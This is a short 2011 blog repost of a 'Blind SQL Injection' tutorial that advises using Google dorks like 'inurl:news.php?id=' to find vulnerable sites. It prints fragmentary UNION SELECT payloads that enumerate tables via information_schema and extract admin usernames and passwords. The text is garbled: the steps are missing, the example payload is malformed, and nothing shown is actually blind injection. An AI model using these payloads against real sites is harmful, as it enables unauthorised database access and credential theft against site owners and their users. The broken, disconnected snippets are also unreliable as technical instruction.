Friday, September 16, 2011

HOWTO : Blind SQL Injection

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : KFProdigy

This is KFProdigy's work but not mine. I re-post it for educational purpose only.

Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!

For more tutorials and tools, check out , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.


from information_schema.tables where table_schema=database()--

concat(column,0x3a,column) from table/*

An example would be UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--

That's all! See you.